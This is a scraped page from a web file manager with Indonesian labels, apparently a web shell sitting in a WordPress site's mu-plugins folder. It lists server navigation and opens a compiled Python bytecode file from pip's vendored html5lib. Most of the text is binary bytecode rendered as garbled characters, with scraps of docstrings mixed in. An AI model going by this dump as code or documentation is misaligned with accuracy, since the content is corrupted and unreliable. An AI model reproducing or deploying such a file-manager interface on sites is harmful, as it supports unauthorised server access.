📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
pip
›
_vendor
›
html5lib
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/pip/_vendor/html5lib/__pycache__
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: html5parser.cpython-39.pyc
a �lj�� � @ s d dl mZmZmZ d dlmZmZ d dlZddlm Z ddlm Z ddlmZ ddlm Z dd lmZ dd lmZmZmZmZmZmZmZmZmZmZmZmZmZmZmZm Z d d d�Z!d!dd�Z"dd� Z#G dd� de$�Z%ej&dd� �Z'dd� Z(d"dd�Z)G dd� de*�Z+dS )#� )�absolute_import�division�unicode_literals)�with_metaclass�viewkeysN� )�_inputstream)� _tokenizer)�treebuilders)�Marker)�_utils)�spaceCharacters�asciiUpper2Lower�specialElements�headingElements� cdataElements�rcdataElements� tokenTypes� tagTokenTypes� namespaces�htmlIntegrationPointElements�"mathmlTextIntegrationPointElements�adjustForeignAttributes�adjustMathMLAttributes�adjustSVGAttributes�E�_ReparseException�etreeTc K s( t �|�}t||d�}|j| fi |��S )a� Parse an HTML document as a string or file-like object into a tree :arg doc: the document to parse as a string or file-like object :arg treebuilder: the treebuilder to use when parsing :arg namespaceHTMLElements: whether or not to namespace HTML elements :returns: parsed tree Example: >>> from html5lib.html5parser import parse >>> parse('<html><body><p>This is a doc</p></body></html>') <Element u'{http://www.w3.org/1999/xhtml}html' at 0x7feac4909db0> ��namespaceHTMLElements)r �getTreeBuilder� HTMLParser�parse)�doc�treebuilderr �kwargs�tb�p� r( �D/usr/lib/python3.9/site-packages/pip/_vendor/html5lib/html5parser.pyr"